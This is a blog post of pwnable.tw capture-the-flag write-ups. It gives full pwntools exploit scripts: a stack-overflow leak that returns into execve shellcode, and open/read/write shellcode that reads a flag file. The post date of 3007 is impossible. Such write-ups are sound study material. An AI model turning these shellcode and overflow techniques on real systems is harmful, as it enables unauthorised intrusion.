pwnable 做题记录

Posted by Elli0t on 3007-01-09

start

Just a start.

ROP 类型的题。这道题的 writeup 里要注意的一点是:执行 ret 时 esp 会往高地址移动 4 字节(指向原返回地址之后的那个栈槽),别忘了这一点。

劫持程序流时,ret 指令相当于 pop eip:eip 从 [esp] 取值,随后 esp 加 4。也就是说 ret 执行完后 esp 指向的是返回地址之后的那个栈槽;在这道题里那个栈槽中保存着一个栈地址,所以把返回地址改成 0x08048087(脚本里用来把栈内容再打印一遍的那个地址)再跑一次,就能把它泄漏出来(脚本里的 leak_stack)。

# -*- coding:utf-8 -*-
from pwn import *
import time

# The target is a 32-bit Linux ELF; debug logging prints every byte on the wire.
context.update(os='linux', arch='i386', log_level='debug')

BIN = './start'            # local copy of the challenge binary
HOST = 'chall.pwnable.tw'  # remote challenge endpoint
PORT = 10000

DEBUG = 0                  # non-zero: attach gdb to the local process before exploiting
LOCAL = True               # flipped at startup depending on argv

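def exploit(io):
    """Leak a stack address from ``./start`` and return into shellcode on the stack.

    The same stack overflow is triggered twice:

    1. ``payload_1`` overwrites the return address with ``0x08048087``; the
       program then prints stack contents again and the first 4 bytes it sends
       are a stack address (``leak_stack``), the slot right after the return
       address per the writeup above.
    2. ``payload_2`` overwrites the return address with ``leak_stack + 24``,
       which is where the shellcode lands (0x14 padding + 4-byte return
       address + 4-byte filler), giving ``execve("/bin//sh", NULL, NULL)``.

    Args:
        io: a pwntools tube (``process`` or ``remote``) connected to the target.

    Returns:
        None; control is handed to ``io.interactive()`` once the shell is up.
    """
    io.recvuntil('F:')  # the banner ends in "CTF:"
    # 0x14 bytes of padding reach the saved return address.
    payload_1 = b'a' * 0x14 + p32(0x08048087)
    io.send(payload_1)
    # recvn() blocks until exactly 4 bytes arrive; recv(4) may return fewer
    # on a short read and u32() would then raise.
    leak_stack = u32(io.recvn(4))
    log.success(' stack_addr ==> ' + str(hex(leak_stack)))
    # i386 execve("/bin//sh", NULL, NULL): xor ecx,ecx; mul ecx; push ecx;
    # push "//sh"; push "/bin"; mov ebx,esp; mov al,0xb; int 0x80.
    # Equivalent to asm(shellcraft.i386.linux.sh()) but pinned so the
    # stack layout below stays stable.  Bytes literals keep this working
    # on both Python 2 and 3 (p32() returns bytes on 3).
    shellcode = (b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e'
                 b'\x89\xe3\xb0\x0b\xcd\x80')
    # Second overflow layout: [0x14 padding][ret -> leak+24][4-byte filler][shellcode]
    payload_2 = b'a' * 0x14 + p32(leak_stack + 24) + p32(0) + shellcode
    io.send(payload_2)
    io.interactive()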

if __name__ == '__main__':
    elf = ELF(BIN)
    # Any extra argv token selects the remote target; no argument means a local run.
    remote_mode = len(sys.argv) > 1
    LOCAL = not remote_mode
    if remote_mode:
        io = remote(HOST, PORT)
    else:
        io = process(BIN)
        # To run against the challenge's libc locally, start the process with
        # env={"LD_PRELOAD": "./libc-2.23.so"} instead.
        log.info('PID: ' + str(proc.pidof(io)[0]))
        if DEBUG:
            # Attach gdb before any payload is sent.
            gdb.attach(io)
    exploit(io)

ORW

Read the flag from /home/orw/flag.

Only open read write syscall are allowed to use.

0x20206761 需要改为 0x00006761(即把末尾的两个空格换成 \x00\x00),这样 open() 拿到的才是以 NUL 结尾的路径 "/home/orw/flag",否则无法得到 flag。下面分别用 Python 自带的 str.decode('hex') 和 pwntools 的 unpack_many 做 Hex -> Str 和 Str -> Hex 转换。⚠️ 注意:unpack_many("/home/orw/flag  ") 的参数长度必须是 4 的倍数,所以这里用两个空格把 14 字节的路径补到 16 字节。

root@pwn:/ctf/work# python
Python 2.7.18rc1 (default, Apr 7 2020, 12:05:55)
[GCC 9.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> "00006761".decode('hex')
'\x00\x00ga'
>>> "6c662f77".decode('hex')
'lf/w'
>>> map(hex,unpack_many("/home/orw/flag "))
['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']
from pwn import *
import time

# 32-bit Linux target; arch='i386' is what makes asm() emit 32-bit code
# (don't forget it!).  Debug logging shows every byte on the wire and
# gdb.attach() opens in a horizontal tmux split.
context.update(log_level='debug', terminal=["tmux", "sp", "-h"], arch='i386', os='linux')

BIN = './orw'              # local copy of the challenge binary
HOST = 'chall.pwnable.tw'  # remote challenge endpoint
PORT = 10001

DEBUG = 0                  # non-zero: attach gdb to the local process before exploiting
LOCAL = True               # flipped at startup depending on argv

# shallcode = ''

# fd = open('/home/orw/flag')
# read(fd,esp,0x30)
# write(1,esp,0x30)
#
# >>> map(hex,unpack_many("/home/orw/flag "))
# ['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']

# i386 open/read/write shellcode, assembled later with pwntools' asm().
# The four pushes build the path on the stack (little-endian dwords, lowest
# address first): "/hom" "e/or" "w/fl" "ag\0\0" -> NUL-terminated
# "/home/orw/flag" at esp.  ecx/edx are zeroed first, so
# open(esp, 0 /*O_RDONLY*/, 0) -> eax = fd.  read(fd, esp, 0x30) reuses the
# same buffer (the path is no longer needed once the file is open), then
# write(1, esp, 0x30) prints it.
# NOTE(review): after the last int 0x80 execution falls off the end into
# whatever bytes follow the shellcode in the buffer; the flag has already been
# written by then, so a crash afterwards does not matter for this challenge.
shellcode = '''
xor eax, eax;
xor ebx, ebx;
xor ecx, ecx;
xor edx, edx;

push 0x00006761;
push 0x6c662f77;
push 0x726f2f65;
push 0x6d6f682f;

mov eax, 5; # open syscall number
mov ebx, esp; # filename
int 0x80; # eax = fd

mov ebx, eax; # fd = flag
mov ecx, esp; # buff = esp
mov edx, 0x30; # size = 0x30
mov eax, 3; # read syscall number
int 0x80;

mov ebx, 1; # fd = stdout
mov ecx, esp; # buff = esp
mov edx, 0x30; # size = 0x30
mov eax, 4; # write syscall number
int 0x80;

'''

def exploit(sh):
    """Deliver the open/read/write shellcode to ``./orw`` and go interactive.

    Args:
        sh: pwntools tube attached to the target process or remote service.

    Returns:
        None; the flag is printed by the shellcode itself.
    """
    prompt = 'Give my your shellcode:'  # sic: the binary's own wording
    sh.recvuntil(prompt)
    code = asm(shellcode)
    sh.sendline(code)
    sh.interactive()

if __name__ == '__main__':
    elf = ELF(BIN)
    # Any extra argv token selects the remote target; no argument means a local run.
    remote_mode = len(sys.argv) > 1
    LOCAL = not remote_mode
    if remote_mode:
        sh = remote(HOST, PORT)
    else:
        sh = process(BIN)
        log.info('PID: ' + str(proc.pidof(sh)[0]))
        if DEBUG:
            # Attach gdb before the shellcode is sent.
            gdb.attach(sh)
    exploit(sh)

CVE-2018-1160

There is an old version Netatalk with some vulnerabilities, such as CVE-2018-1160.

Can you develop a 1-day exploit for this challenge? :p

好家伙,这个运行我都成问题(环境没有配置好)。留着后面研究

calc

Have you ever use Microsoft calculator?

https://blog.csdn.net/qq_43189757/article/details/102680061

https://yongy0ng2.tistory.com/29

https://v1ckydxp.github.io/2019/04/25/pwnable-tw-calc-writeup/

https://www.freebuf.com/articles/others-articles/132283.html